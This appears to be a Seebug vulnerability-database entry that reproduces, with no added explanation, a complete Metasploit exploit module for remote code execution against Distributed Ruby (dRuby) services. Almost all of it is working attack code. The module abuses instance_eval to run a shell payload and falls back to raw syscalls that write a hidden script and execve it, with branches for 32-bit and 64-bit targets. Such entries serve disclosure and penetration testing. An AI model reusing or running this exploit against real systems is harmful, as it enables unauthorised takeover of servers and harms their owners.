Distributed Ruby Send instance_eval/syscall Code Execution

2014-07-01T00:00:00
ID SSV:71530
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##
# $Id: drb_remote_codeexec.rb 12161 2011-03-27 20:00:06Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/framework/
##

require 'msf/core'
require 'drb/drb'
class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Distributed Ruby Send instance_eval/syscall Code Execution',
			'Description'    => %q{
				This module exploits remote code execution vulnerabilities in dRuby
			},
			'Author'         => [ 'joernchen <joernchen@phenoelit.de> (Phenoelit)' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 12161 $',
			'References'     =>
				[
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
						},
					'Space'       => 32768,
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0))

			
			register_options(
				[
					OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
				], self.class)
	end

	def exploit
		puts payload.encoded
		serveruri = datastore['URI']
		DRb.start_service	
		p = DRbObject.new_with_uri(serveruri)
		class << p
			undef :send
		end
		begin
			print_status('trying to exploit instance_eval')
			p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")

		rescue SecurityError => e
			print_status('instance eval failed, trying to exploit syscall')
			filename = "." + Rex::Text.rand_text_alphanumeric(16)
			begin

				# syscall to decide wether it's 64 or 32 bit:
				# it's getpid on 32bit which will succeed, and writev on 64bit
				# which will fail due to missing args
				j = p.send(:syscall,20)
				# syscall open		
				i =  p.send(:syscall,8,filename,0700)
				# syscall write
				p.send(:syscall,4,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
				# syscall close
				p.send(:syscall,6,i)
				# syscall fork
				p.send(:syscall,2)
				# syscall execve
				p.send(:syscall,11,filename,0,0)

			# not vulnerable
			rescue SecurityError => e
			
				print_status('target is not vulnerable')

			# likely 64bit system
			rescue => e
				# syscall creat
				i = p.send(:syscall,85,filename,0700)
				# syscall write
				p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
				# syscall close
				p.send(:syscall,3,i)
				# syscall fork
				p.send(:syscall,57)
				# syscall execve
				p.send(:syscall,59,filename,0,0)
			end
		end
		print_status("payload executed from file #{filename}") unless filename.nil?
		print_status("make sure to remove that file") unless filename.nil?
		handler(nil)
	end
end